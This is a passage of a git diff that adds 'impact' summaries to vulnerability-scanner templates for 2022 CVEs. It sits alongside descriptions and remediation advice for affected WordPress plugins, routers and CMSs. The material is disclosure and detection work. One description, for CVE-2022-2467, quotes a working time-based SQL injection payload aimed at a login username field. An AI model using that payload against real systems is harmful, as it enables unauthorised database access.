a/http/cves/2022/CVE-2022-2314.yaml +++ b/http/cves/2022/CVE-2022-2314.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress VR Calendar plugin through 2.3.2 is susceptible to remote code execution. The plugin allows any user to execute arbitrary PHP functions on the site. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site. remediation: | Update the WordPress VR Calendar plugin to version 2.3.3 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-23178.yaml b/http/cves/2022/CVE-2022-23178.yaml index b196ae35df..9520196922 100644 --- a/http/cves/2022/CVE-2022-23178.yaml +++ b/http/cves/2022/CVE-2022-23178.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields. + impact: | + An attacker can obtain sensitive credentials, leading to unauthorized access and potential compromise of the device. remediation: | Update the Crestron Device firmware to the latest version to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-23347.yaml b/http/cves/2022/CVE-2022-23347.yaml index 83cdd176d5..43282776dc 100644 --- a/http/cves/2022/CVE-2022-23347.yaml +++ b/http/cves/2022/CVE-2022-23347.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: BigAnt Server v5.6.06 is vulnerable to local file inclusion. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the server. remediation: | Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in BigAnt Server v5.6.06. reference: diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml index 1709e05715..5a9e5d055c 100644 --- a/http/cves/2022/CVE-2022-23544.yaml +++ b/http/cves/2022/CVE-2022-23544.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere's origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds. + impact: | + An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade MeterSphere to version 2.5.0 or later to mitigate the SSRF vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2373.yaml b/http/cves/2022/CVE-2022-2373.yaml index cae9b857de..fe1c70c948 100644 --- a/http/cves/2022/CVE-2022-2373.yaml +++ b/http/cves/2022/CVE-2022-2373.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Simply Schedule Appointments plugin before 1.5.7.7 is susceptible to information disclosure. The plugin is missing authorization in a REST endpoint, which can allow an attacker to retrieve user details such as name and email address. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. remediation: | Update to the latest version of the Simply Schedule Appointments plugin (1.5.7.7 or higher) to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2376.yaml b/http/cves/2022/CVE-2022-2376.yaml index 95afd1f267..c2dad18210 100644 --- a/http/cves/2022/CVE-2022-2376.yaml +++ b/http/cves/2022/CVE-2022-2376.yaml @@ -5,6 +5,8 @@ info: author: Random-Robbie severity: medium description: WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users. + impact: | + An attacker can gain sensitive information about the WordPress installation, potentially leading to further attacks. remediation: Fixed in version 7.3.1. reference: - https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad diff --git a/http/cves/2022/CVE-2022-23779.yaml b/http/cves/2022/CVE-2022-23779.yaml index c3f6073e16..19deca757f 100644 --- a/http/cves/2022/CVE-2022-23779.yaml +++ b/http/cves/2022/CVE-2022-23779.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses. + impact: | + An attacker could use the disclosed internal hostnames to plan targeted attacks, gain unauthorized access, or perform reconnaissance on the internal network. remediation: | Apply the latest security patch or update provided by Zoho ManageEngine to fix the internal hostname disclosure vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2379.yaml b/http/cves/2022/CVE-2022-2379.yaml index b39a068ea8..fead6aae7d 100644 --- a/http/cves/2022/CVE-2022-2379.yaml +++ b/http/cves/2022/CVE-2022-2379.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Easy Student Results plugin through 2.2.8 is susceptible to information disclosure. The plugin lacks authorization in its REST API, which can allow an attacker to retrieve sensitive information related to courses, exams, and departments, as well as student grades and information such as email address, physical address, and phone number. + impact: | + An attacker can gain access to sensitive student information, potentially compromising their privacy and security. remediation: | Update to the latest version of the WordPress Easy Student Results plugin (2.2.8) to fix the improper authorization vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-23808.yaml b/http/cves/2022/CVE-2022-23808.yaml index 808bd3a1a3..d48b87eb10 100644 --- a/http/cves/2022/CVE-2022-23808.yaml +++ b/http/cves/2022/CVE-2022-23808.yaml @@ -5,6 +5,8 @@ info: author: cckuailong,daffainfo severity: medium description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Upgrade phpMyAdmin to version 5.1.2 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml index fe241269dd..b67ba74447 100644 --- a/http/cves/2022/CVE-2022-2383.yaml +++ b/http/cves/2022/CVE-2022-2383.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Feed Them Social plugin before 3.0.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of the Feed Them Social plugin (3.0.1 or higher) to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml index b65c68a673..684d5adb7b 100644 --- a/http/cves/2022/CVE-2022-23854.yaml +++ b/http/cves/2022/CVE-2022-23854.yaml @@ -6,6 +6,8 @@ info: severity: high description: | AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion. + impact: | + An attacker can access sensitive information stored on the server, potentially leading to further exploitation or unauthorized access. remediation: | Apply the latest security patches or updates provided by AVEVA to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-23881.yaml b/http/cves/2022/CVE-2022-23881.yaml index 32f58f778b..48b6ebe343 100644 --- a/http/cves/2022/CVE-2022-23881.yaml +++ b/http/cves/2022/CVE-2022-23881.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or upgrade to a patched version of ZZZCMS zzzphp. reference: diff --git a/http/cves/2022/CVE-2022-23898.yaml b/http/cves/2022/CVE-2022-23898.yaml index 0b6a1d6af4..ab735c999f 100644 --- a/http/cves/2022/CVE-2022-23898.yaml +++ b/http/cves/2022/CVE-2022-23898.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | MCMS 5.2.5 contains a SQL injection vulnerability via the categoryId parameter in the file IContentDao.xml. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.5. reference: diff --git a/http/cves/2022/CVE-2022-23944.yaml b/http/cves/2022/CVE-2022-23944.yaml index 0cc39f59aa..4dac52a759 100644 --- a/http/cves/2022/CVE-2022-23944.yaml +++ b/http/cves/2022/CVE-2022-23944.yaml @@ -5,6 +5,8 @@ info: author: cckuakilong severity: critical description: Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Apache ShenYu admin panel. remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch. reference: - https://github.com/apache/incubator-shenyu/pull/2462 diff --git a/http/cves/2022/CVE-2022-24112.yaml b/http/cves/2022/CVE-2022-24112.yaml index 9ff9a9f865..e3a1b3d7e1 100644 --- a/http/cves/2022/CVE-2022-24112.yaml +++ b/http/cves/2022/CVE-2022-24112.yaml @@ -5,6 +5,8 @@ info: author: Mr-xn severity: critical description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`). reference: - https://www.openwall.com/lists/oss-security/2022/02/11/3 diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index 8e8b600d83..94c3498398 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: high description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Upgrade to a patched version of Casdoor or apply the necessary security patches to mitigate the SQL injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-24129.yaml b/http/cves/2022/CVE-2022-24129.yaml index 1cb0fc4801..d02475f0c8 100644 --- a/http/cves/2022/CVE-2022-24129.yaml +++ b/http/cves/2022/CVE-2022-24129.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: The Shibboleth Identity Provider OIDC OP plugin before 3.0.4 is vulnerable to server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter, which allows attackers to interact with arbitrary third-party HTTP services. + impact: | + An attacker can exploit this vulnerability to send crafted requests, potentially leading to unauthorized access to internal resources or information disclosure. remediation: | Upgrade to Shibboleth OIDC OP version 3.0.4 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml index 3076575232..ec121c2d9a 100644 --- a/http/cves/2022/CVE-2022-2414.yaml +++ b/http/cves/2022/CVE-2022-2414.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server. remediation: | Apply the latest security patches and updates provided by the vendor to fix the XML Entity Injection vulnerability in FreeIPA. reference: diff --git a/http/cves/2022/CVE-2022-24181.yaml b/http/cves/2022/CVE-2022-24181.yaml index 6f5a3c0647..b9b787b50b 100644 --- a/http/cves/2022/CVE-2022-24181.yaml +++ b/http/cves/2022/CVE-2022-24181.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of PKP Open Journal Systems (OJS) or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-24223.yaml b/http/cves/2022/CVE-2022-24223.yaml index 829db2e4bf..228dccfea9 100644 --- a/http/cves/2022/CVE-2022-24223.yaml +++ b/http/cves/2022/CVE-2022-24223.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version Atom CMS v2.1 reference: - https://packetstormsecurity.com/files/165922/Atom-CMS-2.0-SQL-Injection.html diff --git a/http/cves/2022/CVE-2022-24260.yaml b/http/cves/2022/CVE-2022-24260.yaml index 9d735a922c..fe8e0e2f2d 100644 --- a/http/cves/2022/CVE-2022-24260.yaml +++ b/http/cves/2022/CVE-2022-24260.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL injection vulnerability in the VoipMonitor application. reference: diff --git a/http/cves/2022/CVE-2022-24264.yaml b/http/cves/2022/CVE-2022-24264.yaml index 15a54ebdee..7c0f9a9640 100644 --- a/http/cves/2022/CVE-2022-24264.yaml +++ b/http/cves/2022/CVE-2022-24264.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-24265.yaml b/http/cves/2022/CVE-2022-24265.yaml index 6346c2428a..a42c1c54d8 100644 --- a/http/cves/2022/CVE-2022-24265.yaml +++ b/http/cves/2022/CVE-2022-24265.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-24266.yaml b/http/cves/2022/CVE-2022-24266.yaml index 20fa124c69..660622cfcd 100644 --- a/http/cves/2022/CVE-2022-24266.yaml +++ b/http/cves/2022/CVE-2022-24266.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-24288.yaml b/http/cves/2022/CVE-2022-24288.yaml index 739b46bcdb..5b213df5de 100644 --- a/http/cves/2022/CVE-2022-24288.yaml +++ b/http/cves/2022/CVE-2022-24288.yaml @@ -5,6 +5,8 @@ info: author: xeldax severity: high description: Apache Airflow prior to version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command Injection from the web UI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system. remediation: | Apply the latest security patches or upgrade to a patched version of Apache Airflow. reference: diff --git a/http/cves/2022/CVE-2022-24384.yaml b/http/cves/2022/CVE-2022-24384.yaml index b91a179cef..1cbb4097a8 100644 --- a/http/cves/2022/CVE-2022-24384.yaml +++ b/http/cves/2022/CVE-2022-24384.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by SmarterTools to fix this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml index 140b5e988e..e3f1e1ed9a 100644 --- a/http/cves/2022/CVE-2022-2462.yaml +++ b/http/cves/2022/CVE-2022-2462.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Transposh plugin through is susceptible to information disclosure via the AJAX action tp_history, which is intended to return data about who has translated a text given by the token parameter. However, the plugin also returns the user's login name as part of the user_login attribute. If an anonymous user submits the translation, the user's IP address is returned. An attacker can leak the WordPress username of translators and potentially execute other unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. remediation: | Upgrade to the latest version of the WordPress Transposh plugin (>=1.0.8.2) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2467.yaml b/http/cves/2022/CVE-2022-2467.yaml index 2085cd680e..133b688696 100644 --- a/http/cves/2022/CVE-2022-2467.yaml +++ b/http/cves/2022/CVE-2022-2467.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Garage Management System 1.0 contains a SQL injection vulnerability in /login.php via manipulation of the argument username with input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Garage Management System 1.0. reference: diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml index 0bdac27064..9a245f8691 100644 --- a/http/cves/2022/CVE-2022-24681.yaml +++ b/http/cves/2022/CVE-2022-24681.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary scripts or theft of sensitive information. remediation: | Upgrade to a version of ManageEngine ADSelfService Plus that is higher than 6121 to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml index b3da1f1325..d12a886213 100644 --- a/http/cves/2022/CVE-2022-24716.yaml +++ b/http/cves/2022/CVE-2022-24716.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials. + impact: | + The vulnerability can lead to unauthorized access to sensitive information, potentially exposing credentials, configuration files, and other sensitive data. remediation: This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated. reference: - https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py diff --git a/http/cves/2022/CVE-2022-24816.yaml b/http/cves/2022/CVE-2022-24816.yaml index ca453a3fb0..d7fa0e63bd 100644 --- a/http/cves/2022/CVE-2022-24816.yaml +++ b/http/cves/2022/CVE-2022-24816.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided via network request are susceptible to remote code execution. The Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects downstream GeoServer 1.1.22. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system. remediation: 1.2.22 contains a patch that disables the ability to inject malicious code into the resulting script. Users unable to upgrade may negate the ability to compile Jiffle scripts from the final application by removing janino-x.y.z.jar from the classpath. reference: - https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html diff --git a/http/cves/2022/CVE-2022-24856.yaml b/http/cves/2022/CVE-2022-24856.yaml index 41a8453ddb..95fe57c73c 100644 --- a/http/cves/2022/CVE-2022-24856.yaml +++ b/http/cves/2022/CVE-2022-24856.yaml @@ -6,6 +6,8 @@ info: severity: high description: | FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur. + impact: | + An attacker can exploit this vulnerability to perform unauthorized actions, such as accessing internal resources, bypassing security controls, or launching further attacks. remediation: | The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole. reference: diff --git a/http/cves/2022/CVE-2022-2486.yaml b/http/cves/2022/CVE-2022-2486.yaml index c264ef9908..1c6776d1b7 100644 --- a/http/cves/2022/CVE-2022-2486.yaml +++ b/http/cves/2022/CVE-2022-2486.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml index dd1b572bee..4f50d7d1d4 100644 --- a/http/cves/2022/CVE-2022-2487.yaml +++ b/http/cves/2022/CVE-2022-2487.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml index d4ea79ae06..898156ea1d 100644 --- a/http/cves/2022/CVE-2022-2488.yaml +++ b/http/cves/2022/CVE-2022-2488.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in /cgi-bin/touchlist_sync.cgi via manipulation of the argument IP. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml index 7fb466b432..2f1e67ba9c 100644 --- a/http/cves/2022/CVE-2022-24899.yaml +++ b/http/cves/2022/CVE-2022-24899.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Contao prior to 4.13.3 contains a cross-site scripting vulnerability. It is possible to inject arbitrary JavaScript code into the canonical tag. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: As a workaround, users may disable canonical tags in the root page settings. reference: - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/ diff --git a/http/cves/2022/CVE-2022-24900.yaml b/http/cves/2022/CVE-2022-24900.yaml index 875af10712..8b82855b81 100644 --- a/http/cves/2022/CVE-2022-24900.yaml +++ b/http/cves/2022/CVE-2022-24900.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Piano LED Visualizer 1.3 application. reference: diff --git a/http/cves/2022/CVE-2022-24990.yaml b/http/cves/2022/CVE-2022-24990.yaml index c58bac8966..f47bb29e07 100644 --- a/http/cves/2022/CVE-2022-24990.yaml +++ b/http/cves/2022/CVE-2022-24990.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: TerraMaster NAS devices running TOS prior to version 4.2.30 are vulnerable to information disclosure. + impact: | + An attacker can exploit this vulnerability to gain sensitive information about the server, potentially leading to further attacks. remediation: | Upgrade the TerraMaster TOS server to version 4.2.30 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-25082.yaml b/http/cves/2022/CVE-2022-25082.yaml index e0fa2cd327..f52f9cb9f6 100644 --- a/http/cves/2022/CVE-2022-25082.yaml +++ b/http/cves/2022/CVE-2022-25082.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. remediation: | Apply the latest firmware update provided by the vendor to fix the command injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-25125.yaml b/http/cves/2022/CVE-2022-25125.yaml index 742ac0bdcc..0789c57360 100644 --- a/http/cves/2022/CVE-2022-25125.yaml +++ b/http/cves/2022/CVE-2022-25125.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | MCMS 5.2.4 contains a SQL injection vulnerability via search.do in the file /mdiy/dict/listExcludeApp. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.4. reference: diff --git a/http/cves/2022/CVE-2022-25216.yaml b/http/cves/2022/CVE-2022-25216.yaml index b1c4c5efb0..e8e9206c58 100644 --- a/http/cves/2022/CVE-2022-25216.yaml +++ b/http/cves/2022/CVE-2022-25216.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: DVDFab 12 Player/PlayerFab is susceptible to local file inclusion which allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access. + impact: | + The vulnerability allows an attacker to include arbitrary local files, potentially leading to unauthorized access, information disclosure. remediation: | Apply the latest patch or update from the vendor to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-25323.yaml b/http/cves/2022/CVE-2022-25323.yaml index 87b134376a..64ed9b59b6 100644 --- a/http/cves/2022/CVE-2022-25323.yaml +++ b/http/cves/2022/CVE-2022-25323.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ZEROF Web Server 2.0. reference: diff --git a/http/cves/2022/CVE-2022-25356.yaml b/http/cves/2022/CVE-2022-25356.yaml index 879029043c..51205d339b 100644 --- a/http/cves/2022/CVE-2022-25356.yaml +++ b/http/cves/2022/CVE-2022-25356.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Alt-n/MDaemon Security Gateway through 8.5.0 is susceptible to XML injection via SecurityGateway.dll?view=login. An attacker can inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. As a result, the XML parser fails the validation process and discloses information such as protection used (2FA), admin email, and product registration keys. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious XML code, leading to various security risks such as information disclosure, privilege escalation. remediation: | Upgrade Alt-n/MDaemon Security Gateway to version 8.5.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2544.yaml b/http/cves/2022/CVE-2022-2544.yaml index ec9e8097c3..bd391e0bd9 100644 --- a/http/cves/2022/CVE-2022-2544.yaml +++ b/http/cves/2022/CVE-2022-2544.yaml @@ -5,6 +5,8 @@ info: author: tess severity: high description: WordPress Ninja Job Board plugin prior to 1.3.3 is susceptible to a direct request vulnerability. The plugin does not protect the directory where it stores uploaded resumes, making it vulnerable to unauthenticated directory listing which allows the download of uploaded resumes. + impact: | + An attacker can access sensitive files and potentially obtain sensitive information from the target system. remediation: | Update to the latest version of the WordPress Ninja Job Board plugin (1.3.3) to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml index 2b38bc2f86..276b51d177 100644 --- a/http/cves/2022/CVE-2022-2546.yaml 